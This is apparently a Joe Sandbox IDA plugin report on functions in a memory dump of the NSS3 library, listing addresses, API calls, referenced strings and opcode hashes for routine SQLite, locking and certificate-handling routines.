Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 37f5dee620c65f5eaf4cf0aa11feec01208048d217405fd58a52816d2cf19ebc
Instruction ID: 71b20217a9cf46ab073da49360f8ddf405831849a4134d33fee91abac98dd9cb
Opcode Fuzzy Hash: 37f5dee620c65f5eaf4cf0aa11feec01208048d217405fd58a52816d2cf19ebc
Instruction Fuzzy Hash: D831E775B492109BEB119EA7AC8CB4F37B8DB13308F418115EB0D97A40D374AC14CBD9

Function 6C4E2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4E2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C4E2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C4E3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C4E30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4E3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4E3178

Strings

%s at line %d of [%.10s], xrefs: 6C4E3171
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4E3022, 6C4E3156, 6C4E3162, 6C4E318A, 6C4E3196, 6C4E31A2, 6C4E31AE, 6C4E31BA, 6C4E31C6
database corruption, xrefs: 6C4E316C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: ff8c628fc78d651ba817ee492906bdc32ff3ed1682cfe9ba6a4956bb344d91fb
Instruction ID: 21975098786a83fd38813f7de6eb0fed2bdb72f87f4acbee19af22d425beae37
Opcode Fuzzy Hash: ff8c628fc78d651ba817ee492906bdc32ff3ed1682cfe9ba6a4956bb344d91fb
Instruction Fuzzy Hash: 79B1AB70E052199BCB19CF9DC884EAEFBB1BF4C305F25842DE805A7B55D774A842CBA4

Function 6C532D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C532D69

Strings

winSeekFile, xrefs: 6C532E9C
winUnmapfile2, xrefs: 6C532F7F
winTruncate1, xrefs: 6C532EBE
el, xrefs: 6C532DD0
@el, xrefs: 6C532E24
Pel, xrefs: 6C532E74, 6C532EC5, 6C532F32, 6C532F5C
winUnmapfile1, xrefs: 6C532F55
winTruncate2, xrefs: 6C532EF8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: __allrem
String ID: @el$Pel$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$el
API String ID: 2933888876-921615804
Opcode ID: 0c94a2561a5012f54e61eaf73303d612c62ac040d440ac8a68c9fa785ab1fca1
Instruction ID: 5b1225bc468af4735318156e3972d6e4a1605ad38f90cc40c4e7213fadfe3744
Opcode Fuzzy Hash: 0c94a2561a5012f54e61eaf73303d612c62ac040d440ac8a68c9fa785ab1fca1
Instruction Fuzzy Hash: C261EE71B006159FDB04CFA9DC84A6A77B1FF89314F108628E91A9B7D1EB31AC06CBD5

Function 6C5B7F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C5B7FB2

Part of subcall function 6C53BA40: TlsGetValue.KERNEL32 ref: 6C53BA51
Part of subcall function 6C53BA40: TlsGetValue.KERNEL32 ref: 6C53BA6B
Part of subcall function 6C53BA40: EnterCriticalSection.KERNEL32 ref: 6C53BA83
Part of subcall function 6C53BA40: TlsGetValue.KERNEL32 ref: 6C53BAA1
Part of subcall function 6C53BA40: _PR_MD_UNLOCK.NSS3 ref: 6C53BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C5B7FD4

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

Part of subcall function 6C5B9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C5B9466

PR_ExitMonitor.NSS3(?), ref: 6C5B801B
PR_EnterMonitor.NSS3(?), ref: 6C5B8034
TlsGetValue.KERNEL32 ref: 6C5B80A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5B80C0
PR_ExitMonitor.NSS3(?), ref: 6C5B811C
PR_ExitMonitor.NSS3(?), ref: 6C5B8134

Strings

), xrefs: 6C5B80DB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 17fbc0a3aa5762a00fdde6148a1d705de44fd15fe51aeda8cbec79893abb805b
Instruction ID: 2b3a0bd9382406c8c4550ac72946f74b39634e5ad7f2a1cdc00646e45767346c
Opcode Fuzzy Hash: 17fbc0a3aa5762a00fdde6148a1d705de44fd15fe51aeda8cbec79893abb805b
Instruction Fuzzy Hash: FC517875A017069BE7119F359C117EB7FB0AF4234CF08052DDD5966A41EB31A908C797

Function 6C55FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C55FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C55FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C55FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C55FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C55FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C55FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C55FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C55FD84

Strings

:, xrefs: 6C55FD78

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 84c33d6c69bdae9aa6f26c312ba7feb3a3ac21b1a91587cc0f298b2900b8746b
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 0F3125B2D002159BEB00CBA4DC05BAF77A8EF51318FA50636DC14A7B00E776E928C7D6

Function 6C540F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C540F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C540F84

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C55F59B,6C66890C,?), ref: 6C540FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C540FC1

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C540FDB
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C540FEF
PL_FreeArenaPool.NSS3(?), ref: 6C541001
PL_FinishArenaPool.NSS3(?), ref: 6C541009

Strings

security, xrefs: 6C540F5C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 69a3fa1b9bcb52d89c46a2dab2fd8446d2698cc281a455dc75fb99f5f1fcd587
Instruction ID: 1cb4be55dcbb164a92a267f071ab0aad1cdf8d121adbe392a4f1da709204ece8
Opcode Fuzzy Hash: 69a3fa1b9bcb52d89c46a2dab2fd8446d2698cc281a455dc75fb99f5f1fcd587
Instruction Fuzzy Hash: 0F21F571900304ABE7109F65DC80AAF7BB4EF85658F108529FC1896601FB31E916CBE6

Function 6C546DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C547D8F,6C547D8F,?,?), ref: 6C546DC8

Part of subcall function 6C59FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C59FE08
Part of subcall function 6C59FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C59FE1D
Part of subcall function 6C59FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C59FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C547D8F,?,?), ref: 6C546DD5

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C668FA0,00000000,?,?,?,?,6C547D8F,?,?), ref: 6C546DF7

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C546E35

Part of subcall function 6C59FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C59FE29
Part of subcall function 6C59FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C59FE3D
Part of subcall function 6C59FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C59FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C546E4C

Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C668FE0,00000000), ref: 6C546E82

Part of subcall function 6C546AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C54B21D,00000000,00000000,6C54B219,?,6C546BFB,00000000,?,00000000,00000000,?,?,?,6C54B21D), ref: 6C546B01
Part of subcall function 6C546AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C546B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C546F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C546F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C668FE0,00000000), ref: 6C546F6B
PR_SetError.NSS3(FFFFE005,00000000,6C547D8F,?,?), ref: 6C546FE1

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 7bcd50d02d79a3e27689d35080448768c28dc32086b29d3b5f580a3c904782c8
Instruction ID: 5213ebbc7e7d88a97b3da54426a3cc5fb7e0d7a08312b06403d7c4ab14af25a2
Opcode Fuzzy Hash: 7bcd50d02d79a3e27689d35080448768c28dc32086b29d3b5f580a3c904782c8
Instruction Fuzzy Hash: EC717071D10786ABEB00CF55CD40BAABBA4FF95348F158269E848D7B11FB70E994CB90

Function 6C580FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C581057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C581085
PK11_GetAllTokens.NSS3 ref: 6C5810B1
free.MOZGLUE(?), ref: 6C581107
PR_SetError.NSS3(00000000,00000000), ref: 6C581172
free.MOZGLUE(?), ref: 6C581182
free.MOZGLUE(?), ref: 6C5811A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C5811C5

Part of subcall function 6C5852C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C55EAC5,00000001), ref: 6C5852DF
Part of subcall function 6C5852C0: EnterCriticalSection.KERNEL32(?), ref: 6C5852F3
Part of subcall function 6C5852C0: PR_Unlock.NSS3(?), ref: 6C585358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5811D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5811F3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 09953e1b07fb48bc643d605efa3df784f49da3c826aa6abe68639372de844cdf
Instruction ID: 7a3ac5a21e7eae0b11324b7c16e736f85a3b74ffe4aa6f873d75c69f4d8a3ec4
Opcode Fuzzy Hash: 09953e1b07fb48bc643d605efa3df784f49da3c826aa6abe68639372de844cdf
Instruction Fuzzy Hash: 3A6182B0E02355DBEB00DFA5DC81BABB7B5AF44348F144128E82AAB741EB31E944CB55

Function 6C58ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE10
EnterCriticalSection.KERNEL32(?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C56D079,00000000,00000001), ref: 6C58AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE7F
TlsGetValue.KERNEL32(?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AEF1
free.MOZGLUE(6C56CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C56CDBB,?), ref: 6C58AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AF30

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 35806d6f7b329d9a1ce24dae949c62ac5d217482e81b240b38804d5adae4d9cf
Instruction ID: 51204d4cc940ece7678b4f838ff492b17e0300952a94ddb4964558915c3a4464
Opcode Fuzzy Hash: 35806d6f7b329d9a1ce24dae949c62ac5d217482e81b240b38804d5adae4d9cf
Instruction Fuzzy Hash: 4051ADB5A02612EFDB00DF25DC85B5AB7B4FF48318F144A64E80997A51E731F8A4CBE1

Function 6C564CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C56AB7F,?,00000000,?), ref: 6C564CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C56AB7F,?,00000000,?), ref: 6C564CC8
TlsGetValue.KERNEL32(?,6C56AB7F,?,00000000,?), ref: 6C564CE0
EnterCriticalSection.KERNEL32(?,?,6C56AB7F,?,00000000,?), ref: 6C564CF4
PL_HashTableLookup.NSS3(?,?,?,6C56AB7F,?,00000000,?), ref: 6C564D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C564D10

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C564D26

Part of subcall function 6C609DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DC6
Part of subcall function 6C609DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DD1
Part of subcall function 6C609DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C609DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C564D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C564DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C564E02

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 8790969e485b81a831b998fb271e3773abfc7b880716a7b79e50b3107e485041
Instruction ID: f3c11c811671ed2041fcaf74773f4ac4a8c1d86fda17bd946b50d84e51f46135
Opcode Fuzzy Hash: 8790969e485b81a831b998fb271e3773abfc7b880716a7b79e50b3107e485041
Instruction Fuzzy Hash: 6941A4B6E00205EBEB01DF26EC9496A77B8AF45258F044571EC0987B21FB31DD28C7D2

Function 6C54BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C54BFFB

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C54C015

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C54C032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C54C04D

Part of subcall function 6C5969E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C596A47
Part of subcall function 6C5969E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C596A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C54C064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C54C07B

Part of subcall function 6C548980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C547310), ref: 6C5489B8
Part of subcall function 6C548980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C547310), ref: 6C5489E6
Part of subcall function 6C548980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C548A00
Part of subcall function 6C548980: CERT_CopyRDN.NSS3(00000004,00000000,6C547310,?,?,00000004,?), ref: 6C548A1B
Part of subcall function 6C548980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C548A74

